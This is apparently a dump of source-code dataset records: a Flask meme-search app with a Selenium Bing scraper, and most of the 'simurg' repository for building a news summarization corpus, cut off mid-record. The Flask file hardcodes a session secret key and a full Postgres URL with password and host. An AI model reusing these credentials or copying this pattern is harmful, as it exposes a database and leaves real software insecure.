"text": "from flask import Flask, render_template, request, redirect, url_for, session\nfrom getitem import getitem\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.secret_key = \"w^dr8@O4IiR7\"\napp.config['SQLALCHEMY_DATABASE_URL'] = \"postgres://etrdaefwshxfkb:16d8d6f38f1b3021b4c5b833cb2e2d4407d2ec91acb560174386c9782867c6d4@ec2-52-86-73-86.compute-1.amazonaws.com:5432/dada9tvecoeq0h\"\n\ndb = SQLAlchemy(app)\n\nclass DataBass(db.Model):\n _id = db.Column(db.Integer, primary_key=True)\n runtime = db.Column(db.Integer)\n keyword = db.Column(db.String())\n \n def __init__(self, runtime, keyword):\n self.runtime = runtime\n self.keyword = keyword\n\ndef getApp():\n return app\n\[email protected](\"/\", methods=[\"GET\", \"POST\"])\[email protected](\"/start\", methods=[\"GET\", \"POST\"])\ndef start():\n if request.method == \"POST\":\n session[\"keyword\"] = request.form[\"keyword\"]\n return redirect(url_for(\"output\"))\n else:\n return render_template(\"main.html\")\n\[email protected](\"/output\")\ndef output():\n if \"keyword\" in session:\n img = getitem(session[\"keyword\"])[0]\n runtime = getitem(session[\"keyword\"])[1]\n data = DataBass(runtime, session[\"keyword\"].lower())\n db.session.add(data)\n db.session.commit()\n session.pop(\"keyword\")\n return render_template(\"output.html\", img=img, runtime=runtime)\n else:\n return 'no keyword, go to <a href=\"/start\">start</a>'\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.6785714030265808,
"alphanum_fraction": 0.6920995712280273,
"avg_line_length": 41.97674560546875,
"blob_id": "093f378399c91a9b44bca953843da9acd017304c",
"content_id": "e6201b01bb78b3b4e2a72255d0cc6d338399190a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1848,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 43,
"path": "/getitem.py",
"repo_name": "AdamD-967/RandMem",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep, time\nfrom random import choice\nimport os\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndef getitem(name):\n ts = time()\n opts = Options()\n opts.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n opts.add_argument(\"--headless\")\n opts.add_argument(\"--disable-dev-shm-usage\")\n opts.add_argument(\"--no-sandbox\")\n driver = Chrome(ChromeDriverManager().install(), options=opts)\n\n driver.get(\"https://www.bing.com/\")\n\n WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/div[3]/div[2]/div[2]/form/input[1]\")))\n search = driver.find_element_by_xpath(r\"/html/body/div[3]/div[2]/div[2]/form/input[1]\")\n search.send_keys(name+\" meme\")\n search.submit()\n\n WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/header/nav/ul/li[2]/a\")))\n driver.find_element_by_xpath(r\"/html/body/header/nav/ul/li[2]/a\").click()\n sleep(2)\n \n h = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(2)\n nh = driver.execute_script(\"return document.body.scrollHeight\")\n if nh == h:\n break\n h = nh\n WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/div[3]/div[5]/div[3]/div[1]/ul[1]/li[1]/div/div/a/div/img\")))\n content = driver.find_elements_by_class_name(\"mimg\")\n image = choice(content).get_attribute(\"src\")\n driver.close()\n return [image, str(time()-ts)+\" s\"]\n"
}
] | 2 |
pasmod/simurg | https://github.com/pasmod/simurg | e9fe185bb4ddb1dfe35d3459b89891a168a8fb4b | 9fe84fb300810ab7f703385c2dd1e5e7afa712f9 | 925ccdf93bb69ad3160057cc04cd0457a4def0e6 | refs/heads/master | 2021-04-12T03:42:26.815547 | 2017-03-28T08:05:04 | 2017-03-28T08:05:04 | 53,422,442 | 5 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5589905381202698,
"alphanum_fraction": 0.5640378594398499,
"avg_line_length": 26.807018280029297,
"blob_id": "c68721753f0d84902bfecf8dd7f8619082be4893",
"content_id": "ec893ff3ea09ea6f606edfe3bd904bdfda9c84df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1585,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 57,
"path": "/simurg/clients/redis_client.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\nimport config\nimport redis\nimport os\n\n\nclass RedisClient():\n def __init__(self, lang='de'):\n self.redis = redis.StrictRedis(\n host=os.environ['DB_PORT_6379_TCP_ADDR'],\n port=os.environ['DB_PORT_6379_TCP_PORT'],\n db=config.REDIS_DBS[lang])\n self.lang = lang\n\n def insert(self, news):\n \"\"\"Insert a news object into database\n\n # Arguments\n news: news object to be inserted\n \"\"\"\n key = news['url']\n self.redis.hset(key, 'id', news['id'])\n self.redis.hset(key, 'url', news['url'])\n self.redis.hset(key, 'wayback_url', news['wayback_url'])\n self.redis.hset(key, 'headline_selector', news['headline_selector'])\n self.redis.hset(key, 'timestamp', news['timestamp'])\n logging.info('inserted news with url: {}'.format(news['url']))\n\n def exists(self, key):\n \"\"\"Check if the key exists in the database\n\n # Arguments\n key: key to be checked\n\n # Returns\n exists: True if the key exists in the database\n \"\"\"\n return self.redis.exists(key)\n\n def keys(self):\n \"\"\"Returns all keys in the database\n\n # Returns\n keys: all keys in the database\n \"\"\"\n return self.redis.keys()\n\n def get(self, key):\n \"\"\"Returns the values of a given keys as dictionary\n\n # Arguments\n key: key to be retrieved\n\n # Returns\n dictionary: value of the keys in form of a dictionary\n \"\"\"\n return self.redis.hgetall(key)\n"
},
{
"alpha_fraction": 0.7426573634147644,
"alphanum_fraction": 0.7454545497894287,
"avg_line_length": 28.79166603088379,
"blob_id": "87369d45a4ba39339f4598ac97ef4cea10ada013",
"content_id": "1a3bf27e8d01df2ac0f161be49730c2d67e51f33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 715,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 24,
"path": "/simurg/__init__.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from logger.logstash_formatter import LogstashFormatterV2\nfrom simurg import create_template_corpus # noqa\nfrom simurg import populate_template_corpus # noqa\nimport logging\n\n\ndef config_logger(log_level=logging.INFO):\n \"\"\"Configures the logger\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(log_level)\n\n # Disables the logs from the requests library\n requests_log = logging.getLogger(\"requests\")\n requests_log.addHandler(logging.NullHandler())\n requests_log.propagate = False\n\n # Sets formatter to the logstash formatter\n handler = logging.StreamHandler()\n formatter = LogstashFormatterV2()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\nconfig_logger()\n"
},
{
"alpha_fraction": 0.617521345615387,
"alphanum_fraction": 0.617521345615387,
"avg_line_length": 21.285715103149414,
"blob_id": "b7f61f003dfb3ff86d7644b05627d2614219b3b0",
"content_id": "ef847ffe6b0aa77f5ea9cdb167da7bf47768aa2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 21,
"path": "/simurg/util.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\n\n\ndef is_valid(news, field=None):\n \"\"\"Checks fields in a news object for validity. If a field does not exist,\n or its value is not defined, return False.\n\n # Arguments\n news: a news dictionary object\n field: field to be checked for validity\n\n # Returns:\n valid: returns true if field is valid\n \"\"\"\n try:\n news[field]\n except:\n return False\n if news[field]:\n return True\n return False\n"
},
{
"alpha_fraction": 0.6102719306945801,
"alphanum_fraction": 0.6116817593574524,
"avg_line_length": 30.42405128479004,
"blob_id": "5001d627dfd032c8ff2bb3de5f1e8d5b8383f37e",
"content_id": "f0a795d4f019be6474001694a8ffe66fb5b7b7dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4965,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 158,
"path": "/simurg/scrapper/template.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from selector_finder import find_selector\nfrom dragnet import content_extractor\nfrom collections import OrderedDict\nfrom unidecode import unidecode\nfrom bs4 import BeautifulSoup\nfrom simurg.clients.fetcher import fetch\nfrom simurg.util import is_valid\nimport logging\nimport os.path\nimport time\nimport re\n\n\ndef clean_soup(soup):\n \"\"\"Removes some elements that may negatively affect the\n quality of headline extraction\n\n # Arguments\n soup: parsed html document\n \"\"\"\n exclude_tags = ['style', 'script', '[document]', 'head', 'title']\n [s.extract() for s in soup(exclude_tags)]\n\n\ndef find_headline_element(soup, headline):\n \"\"\"Finds the headline element on a page based on a headline hint.\n\n # Argument\n soup: parsed html page\n headline: headline hint to be used\n\n # Returns\n el: headline element (None if not found)\n \"\"\"\n clean_soup(soup)\n # headline sometimes contains \"...\" at the end. We eliminate it.\n headline = headline[:-4]\n if ':' in headline:\n headline = headline.split(':')[1]\n elems = soup(text=re.compile(re.escape(headline)))\n d = {}\n for el in elems:\n d[el.parent] = el.parent.text.strip()\n headline_elems = sorted(d, key=lambda k: len(d[k]))\n if len(headline_elems) > 0:\n return headline_elems\n logging.debug('Headline \"{}\" not found'.format(unidecode(headline)))\n return None\n\n\ndef append_html(news, redis_client):\n \"\"\"Appends an html field to the news, only if the wayback_url is valid and\n the url does not already exist in the database.\n\n # Arguments\n news: news object as dictionary\n\n # Returns\n news: news object with or without html field\n \"\"\"\n if is_valid(news, field='wayback_url'):\n fetch_url = news['wayback_url']\n else:\n fetch_url = news['url']\n if not redis_client.exists(news['url']):\n news['html'] = fetch(fetch_url)\n return news\n logging.info('Skipping duplicate url: {}'.format(news['url']))\n return news\n\n\ndef append_headline_selector(news):\n \"\"\"Appends the headline css selector field to the news, only if the html\n field exists and is valid.\n\n # Arguments\n news: news object as dictionary\n\n # Returns\n news: news object with or without headline css selector field\n \"\"\"\n if is_valid(news, field='html'):\n soup = BeautifulSoup(news['html'], 'html.parser')\n headline_elems = find_headline_element(soup, news['headline'])\n if headline_elems:\n news['headline_selector'] = find_selector(soup, headline_elems)\n return news\n logging.debug('Headline css selector could not be found!')\n else:\n logging.debug('Fetching html page failed. url={}'.\n format(news['url']))\n return news\n\n\ndef get_base_url(lang='de'):\n \"\"\"Return the google news url for a specific language\n\n # Arguments\n lang: required language for google news\n\n # Returns\n url: corresponding google news url for the given language\n \"\"\"\n if lang == 'de':\n return 'http://news.google.com/news?ned=de'\n if lang == 'en':\n return 'http://news.google.com/news?ned=us'\n if lang == 'fr':\n return 'https://news.google.com/news?ned=fr'\n if lang == 'it':\n return 'https://news.google.com/news?ned=it'\n else:\n raise ValueError('unsupported language {}'.format(lang))\n\n\ndef populate(redis_client):\n \"\"\"Populates the entries in the database with fields such as headline,\n body, html and url\n\n # Arguments\n lang: language of the database\n\n # Returns\n news: news objects populated with required fields\n \"\"\"\n keys = redis_client.keys()\n folder = 'docs/{}/'.format(redis_client.lang)\n for key in keys:\n value = redis_client.get(key)\n f = folder + value['id'] + '.json'\n if os.path.isfile(f):\n logging.info('Skipping existing document: {}'.format(f))\n continue\n if value['wayback_url'] == 'None':\n html = fetch(value['url'])\n else:\n html = fetch(value['wayback_url'])\n time.sleep(1)\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n else:\n continue\n headline_elems = soup.select(value['headline_selector'], None)\n if len(headline_elems) > 0:\n headline = headline_elems[0].text.strip()\n else:\n logging.debug('Headline can not be refound: url={}, selector={}'\n .format(value['url'], value['headline_selector']))\n continue\n news = OrderedDict()\n news['id'] = value['id']\n news['timestamp'] = value['timestamp']\n news['lang'] = redis_client.lang\n news['url'] = value['url']\n news['wayback_url'] = value['wayback_url']\n news['headline'] = headline.strip()\n news['body'] = content_extractor.analyze(html).strip()\n yield news\n"
},
{
"alpha_fraction": 0.7685233950614929,
"alphanum_fraction": 0.7724645137786865,
"avg_line_length": 51.136985778808594,
"blob_id": "3c2cb247cdf959c6beb74c267051716a8e66c7e0",
"content_id": "1674cb301a9317392e14744fe41abe8fde8f65ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3806,
"license_type": "permissive",
"max_line_length": 821,
"num_lines": 73,
"path": "/README.md",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "# Simurg\n\n[](https://travis-ci.org/pasmod/simurg)\n[](https://github.com/pasmod/simurg/blob/master/License.md)\n\nA tool to create extendable multilingual corpora for abstractive text summarization (and other applications).\n## Motivation\nAbstractive single document summarization is considered as a difficult problem in the field of artificial intelligence and natural language processing. Meanwhile and specifically in the last two years, several deep learning summarization approaches were introduced that once again attracted the attention of researchers to this field.\n\nIt is a known issue that deep learning approaches do not work well with small amount of data. With some exceptions, this is unfortunately the case for most of the data sets available for the summarization task. Beside this problem, it should be considered that phonetic, morphological, semantic and syntactic features of the language are constantly changing over time and unfortunately most of the summarization corpora are constructed from old resources. Another problem is the language of the corpora. Not only in the summarization field, but also in other fields of natural language processing, most of the corpora are only available in English. In addition to the above problems, licence terms and fees of the corpora is a obstacle that prevent many academics and specifically non-academics from accessing these data.\n\nSimurg is an open source framework to create an extensable multilingual corpus for abstractive single document summarization that addresses the above mentioned problems.\n\n## Architecture\nCreating the corpus consists of two phases:\n- Constructing the template corpus: The template corpus is the sharable part of the Simurg corpus.\n\n<img src=\"https://github.com/pasmod/simurg/blob/master/images/architecture.jpg\" width=\"300\", align=\"middle\">\n- Populating the template corpus: In this phase the template corpus will be populated with all the required information and the result will be a collection of JSON documents.\n\n## Dependencies\n- [Docker](https://www.docker.com/)\n\n## Setup the Project\n- ```make build```: to build the docker image\n- ```make start_redis```: to start the redis server\n- ```make connect_redis```: to use the redis command line interface\n- ```make run```: to run the container\n\n## Template Corpus\nTo create the template corpus use the following commands:\n\n```make run```: to run the container\n\nIn the container run ```python``` and then enter the following two python commands:\n\n```python\nimport simurg\nsimurg.create_template_corpus(lang='de')\n```\n\n## Populating the Template Corpus\nRun the following command to create the final corpus:\n\n```make run```: to run the container\n\nIn the container run ```python``` and then enter the following two python commands:\n```python\nimport simurg\nsimurg.populate_template_corpus(lang='de')\n```\n\n## Adding New Languages:\nCurrently English, German, French and Italian are supported. Adding a new language is simple:\nIn the file ```config.py``` modify the variable ```REDIS_DBS``` and add the new language code. Example to add Farsi:\n```python\nREDIS_DB = {\n 'de': 0,\n 'en': 1,\n 'fr': 2,\n 'it': 3,\n 'tr': 4\n}\n```\n\n## Parallel Execution\nIf you want to construct a corpur for multiple languages at the same time, simply start several containers at the same time. For example to construct English, German, French and Italian corpus at the same time run the following commands:\n```bash\nmake run # For the first language\ndocker exec -it simurg bash -l # For the second language\ndocker exec -it simurg bash -l # For the third language\ndocker exec -it simurg bash -l # For the fourth language\n```\n"
},
{
"alpha_fraction": 0.6861110925674438,
"alphanum_fraction": 0.6888889074325562,
"avg_line_length": 28.032258987426758,
"blob_id": "f189092c529a8c87d4fe1de58b0fee5e986e5fca",
"content_id": "bfee9c4e2502ea8cbf9f9a31acf2979004702a2c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1800,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 62,
"path": "/simurg/scrapper/scrapper.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom urlparse import urljoin\nimport selectors\nimport urllib2\nimport logging\n\n\ndef get_story_urls(base_url, selector=selectors.TOP_STORY_LINK_SELECTOR):\n \"\"\"Returns all top story urls on the base google news page\n\n # Arguments\n base_url: base google news url\n selector: css selector to select the top story urls\n\n # Returns\n urls: list of stop story urls\n \"\"\"\n response = urllib2.urlopen(base_url)\n soup = BeautifulSoup(response.read(), 'html.parser')\n hrefs = [el.get('href') for el in soup.select(selector)]\n urls = [urljoin(base_url, href) for href in hrefs]\n logging.info('Discovered {} stories on {}'.format(len(urls), base_url))\n return urls\n\n\ndef get_news_elements(soup, selector=selectors.NEWS_ELEMENT_SELECTOR):\n \"\"\"Returns all news section elements from a top story page\n\n # Arguments\n soup: parsed top story page\n selector: css selector to select news sections\n\n # Returns\n els: news section elements\n \"\"\"\n return soup.select(selector)\n\n\ndef get_news_link(news_element, selector=selectors.NEWS_LINK_SELECTOR):\n \"\"\"Returns the news link inside a news section\n\n # Arguments\n news_element: element corresponding to a news section\n selector: css selector to select the news link\n\n # Returns\n el: news link element\n \"\"\"\n return news_element.select(selector)[0]\n\n\ndef get_news_headline(news_element, selector=selectors.HEADLINE_SELECTOR):\n \"\"\"Returns the headline of a news section element\n\n # Arguments\n news_element: element corresponding to a news section\n selector: css selector to select news headline\n\n # Returns\n el: element containing the news headline\n \"\"\"\n return news_element.select(selector)[0]\n"
},
{
"alpha_fraction": 0.7587131261825562,
"alphanum_fraction": 0.7667560577392578,
"avg_line_length": 32.90909194946289,
"blob_id": "d0504af6fc9986d3d1569136742047fc5b0dab96",
"content_id": "0634f0e43d95506e6a5e135e8922acc9266d86a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 11,
"path": "/simurg/scrapper/selectors.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "# Main page consists of 10 top stories\nTOP_STORY_LINK_SELECTOR = 'div.topic a'\n\n# Each top story consists of news sections\nNEWS_ELEMENT_SELECTOR = 'div.blended-wrapper.esc-wrapper'\n\n# Each news section contains a link to the news\nNEWS_LINK_SELECTOR = 'h2.esc-lead-article-title a'\n\n# Each news section contains the headline of the news\nHEADLINE_SELECTOR = 'span.titletext'\n"
},
{
"alpha_fraction": 0.6021634340286255,
"alphanum_fraction": 0.6048678159713745,
"avg_line_length": 25,
"blob_id": "4c67dc455d3b5435fb1b66107da741d6610a0e50",
"content_id": "2140462b0316dbd029244e0e32ff55d18b20dfd5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3328,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 128,
"path": "/simurg/scrapper/selector_finder.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\n\n\ndef find_selector(soup, elems):\n \"\"\"Given a parsed html document, find a css selector for the given element.\n\n # Arguments\n soup: parsed html document\n el: html element for which a css selector has to be found\n\n # Returns\n selector: a css selector (or None if nothing found)\n \"\"\"\n css_selectors = [class_css_selector,\n id_css_selector,\n attribute_css_selector,\n type_css_selector]\n for selector in css_selectors:\n for el in elems:\n css_selector = selector(el)\n if valid(soup, css_selector) and \\\n unique(soup, css_selector) and \\\n match(soup, css_selector, el):\n return css_selector\n return None\n\n\ndef id_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el#id from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el#id\n \"\"\"\n css_id = el.get('id', None)\n if css_id and len(css_id[0].strip()) > 0:\n return '{}#{}'.format(el.name, css_id[0])\n return None\n\n\ndef class_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el.class from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el.class\n \"\"\"\n css_class = el.get('class', None)\n if css_class and len(css_class[0].strip()) > 0:\n return '{}.{}'.format(el.name, css_class[0])\n return None\n\n\ndef attribute_css_selector(el, attribute='itemprop'):\n \"\"\"Tries to construct a css selector of the form el[attribute=value]\n from the element\n\n # Argument\n el: an html element\n attribute: css attribute\n\n # Returns\n selector: css selector of the form el.class\n \"\"\"\n value = el.attrs.get(attribute, None)\n if value and len(value.strip()) > 0:\n return '{}[{}={}]'.format(el.name, attribute, value)\n return None\n\n\ndef type_css_selector(el):\n \"\"\"Tries to construct a css selector of the form el from the element\n\n # Argument\n el: an html element\n\n # Returns\n selector: css selector of the form el\n \"\"\"\n if el.name:\n return '{}'.format(el.name)\n return None\n\n\ndef unique(soup, css_selector):\n \"\"\"Checks if selecting the css selector returns a unique element.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector to be tested\n\n # Returns\n unique: True if a unique element is returned\n \"\"\"\n return len(list(soup.select(css_selector))) == 1\n\n\ndef valid(soup, css_selector):\n \"\"\"Checks if the css selector is valid.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector for which the validity has to be checked\n\n # Returns\n valid: True if css slector is valid\n \"\"\"\n try:\n soup.select(css_selector)\n return True\n except:\n return False\n\n\ndef match(soup, css_selector, el):\n \"\"\"Checks if the selected element by the css selector matches\n the given element.\n\n # Arguments\n soup: parsed html document\n css_selector: css selector that returns an element\n el: html element to be matched with\n \"\"\"\n return soup.select(css_selector)[0] == el\n"
},
{
"alpha_fraction": 0.5966851115226746,
"alphanum_fraction": 0.600368320941925,
"avg_line_length": 20.719999313354492,
"blob_id": "a59317f8958fb8252a0d24d3a0ee6e14cf926bf7",
"content_id": "92c56577e62b85176bbc807107d61858a8995fbc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 543,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 25,
"path": "/simurg/clients/fetcher.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import logging\nimport httplib2\n\n\nh = httplib2.Http(\".cache\")\n\n\ndef fetch(url):\n \"\"\"Downloads a URL.\n Args:\n url: The URL.\n max_attempts: Max attempts for downloading the URL.\n timeout: Connection timeout in seconds for each attempt.\n Returns:\n The HTML at the URL or None if the request failed.\n \"\"\"\n if not url:\n return None\n\n try:\n (_, content) = h.request(url, \"GET\")\n return content\n except:\n logging.debug('Fetching url failed: {}'.format(url))\n return None\n"
},
{
"alpha_fraction": 0.5665770769119263,
"alphanum_fraction": 0.5697532296180725,
"avg_line_length": 31.22834587097168,
"blob_id": "a516166dbb3533ae75e2a0c8ace848504fad019a",
"content_id": "d9ed823b8b24983b8219bd40a9bdb750d5a93a79",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4093,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 127,
"path": "/simurg/logger/logstash_formatter.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "'''\nThis library is provided to allow standard python\nlogging to output log data as JSON formatted strings\nready to be shipped out to logstash.\n'''\nimport logging\nimport socket\nimport datetime\nimport traceback as tb\nimport json\n\n\ndef _default_json_default(obj):\n \"\"\"\n Coerce everything to strings.\n All objects representing time get output as ISO8601.\n \"\"\"\n if isinstance(obj, (datetime.datetime, datetime.date, datetime.time)):\n return obj.isoformat()\n else:\n return str(obj)\n\n\nclass LogstashFormatter(logging.Formatter):\n \"\"\"\n A custom formatter to prepare logs to be\n shipped out to logstash.\n \"\"\"\n\n def __init__(self,\n fmt=None,\n datefmt=None,\n json_cls=None,\n json_default=_default_json_default):\n \"\"\"\n :param fmt: Config as a JSON string, allowed fields;\n extra: provide extra fields always present in logs\n source_host: override source host name\n :param datefmt: Date format to use (required by logging.Formatter\n interface but not used)\n :param json_cls: JSON encoder to forward to json.dumps\n :param json_default: Default JSON representation for unknown types,\n by default coerce everything to a string\n \"\"\"\n\n if fmt is not None:\n self._fmt = json.loads(fmt)\n else:\n self._fmt = {}\n self.json_default = json_default\n self.json_cls = json_cls\n if 'extra' not in self._fmt:\n self.defaults = {}\n else:\n self.defaults = self._fmt['extra']\n if 'source_host' in self._fmt:\n self.source_host = self._fmt['source_host']\n else:\n try:\n self.source_host = socket.gethostname()\n except:\n self.source_host = \"\"\n\n\nclass LogstashFormatterV2(LogstashFormatter):\n \"\"\"\n A custom formatter to prepare logs to be\n shipped out to logstash V1 format.\n \"\"\"\n\n def _make_timestamp(self, now):\n sft = now.strftime(\"%Y-%m-%dT%H:%M:%S\")\n millis = \".%03dZ\" % (now.microsecond / 1000)\n return sft + millis\n\n def _drop_some(self, fields):\n for field in ['args', 'created', 'filename', 'funcName', 'levelno',\n 'lineno', 'module', 'msecs', 'pathname', 'process',\n 'processName', 'relativeCreated', 'source_host',\n 'stack_info', 'thread', 'threadName']:\n fields.pop(field, None)\n\n def _filter_severity(self, fields):\n severity = fields.pop('levelname').lower()\n if 'warning' == severity:\n severity = 'warn'\n elif 'critical' == severity:\n severity = 'fatal'\n fields['severity'] = severity\n\n def _filter_message(self, fields):\n fields['message'] = fields.pop('msg', None)\n\n if type(fields['message']) is dict:\n params = fields.pop('message')\n fields['message'] = params.pop('message', None)\n fields['params'] = params\n\n def _filter_exception(self, fields):\n if 'exc_info' in fields:\n if fields['exc_info']:\n formatted = tb.format_exception(*fields['exc_info'])\n fields['exception'] = formatted\n fields.pop('exc_info')\n\n if 'exc_text' in fields and not fields['exc_text']:\n fields.pop('exc_text')\n\n def format(self, record):\n \"\"\"\n Format a log record to JSON, if the message is a dict\n assume an empty message and use the dict as additional\n fields.\n \"\"\"\n\n fields = record.__dict__.copy()\n self._drop_some(fields)\n self._filter_severity(fields)\n self._filter_message(fields)\n self._filter_exception(fields)\n fields['@timestamp'] = self._make_timestamp(datetime.datetime.utcnow())\n fields['@version'] = 1\n\n logr = self.defaults.copy()\n logr.update(fields)\n\n return json.dumps(logr, default=self.json_default, cls=self.json_cls)\n"
},
{
"alpha_fraction": 0.6480541229248047,
"alphanum_fraction": 0.6615905165672302,
"avg_line_length": 24.69565200805664,
"blob_id": "d8ee7d6eccd502f329f9f92ca537ca1df246b54c",
"content_id": "6d86c4416d31eff48cc339e41748374feddff2c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 23,
"path": "/Makefile",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "name = simurg\nregistry = pasmod\n\nbuild:\n\tdocker build -t $(registry)/$(name) $(BUILD_OPTS) .\n\nstop:\n\tdocker rm -f $(name) || true\n\nrun: stop\n\tdocker run -it --rm=true -v $(shell pwd):/var/www --link redis:db --name=$(name) $(registry)/$(name) bash -l\n\nstart: stop\n\tdocker run -d -v $(shell pwd):/var/www --name=$(name) $(registry)/$(name)\n\nstart_redis: stop_redis\n\tdocker run --name redis -v $(shell pwd)/redis:/data -d redis redis-server --appendonly yes\n\nstop_redis:\n\tdocker rm -f redis || true\n\nconnect_redis:\n\tdocker run -it --link redis:redis --rm redis redis-cli -h redis -p 6379:6379\n"
},
{
"alpha_fraction": 0.6184130907058716,
"alphanum_fraction": 0.6196244955062866,
"avg_line_length": 29.574073791503906,
"blob_id": "3b61dfea6256e51b7a83271798ca877061a8fd1a",
"content_id": "720bd36310004b76701e25f23b23db61234c1989",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1651,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 54,
"path": "/simurg/scrapper/wayback.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "import requests\nimport logging\nimport re\n\n\nwayback_pattern = re.compile(r'web/([^/]*)/')\n\n\ndef get_wayback_url(url):\n \"\"\"Retrieves the URL for the latest historic copy using Wayback Machine.\n Args:\n urls: The URL for a specific page (canonical URL + forwarding URL's).\n max_attempts: The maximum attempts at requesting the URL.\n Returns:\n The URL or None if no copy is stored for the URL.\n Raises:\n RuntimeError: Failed to retrieve the URL.\n \"\"\"\n logging.debug('Retrieving wayback url for url: {}'.format(url))\n\n if not url:\n return None\n\n index_collection_url = 'http://archive.org/wayback/available'\n\n payload = {'url': url}\n\n try:\n entry_req = requests.get(index_collection_url, params=payload,\n allow_redirects=False)\n\n if entry_req.status_code != requests.codes.ok:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n entry = entry_req.json()\n\n if 'closest' not in entry['archived_snapshots']:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n wayback_url = entry['archived_snapshots']['closest']['url']\n wayback_url = wayback_pattern.sub(r'web/\\g<1>id_/', wayback_url, 1)\n logging.debug('Success in retrieving the wayback url for: {}'.\n format(url))\n\n return wayback_url\n\n except requests.exceptions.ConnectionError:\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n\n logging.debug('Failed retrieving url for: {}'.format(url))\n return None\n"
},
{
"alpha_fraction": 0.6223490834236145,
"alphanum_fraction": 0.6239804029464722,
"avg_line_length": 30.435897827148438,
"blob_id": "b7b720a71398b875f75107de625a36ae0e0736df",
"content_id": "43dde1b2ca35a775d8c711337b64f1231fe2f53c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 39,
"path": "/simurg/scrapper/news_builder.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
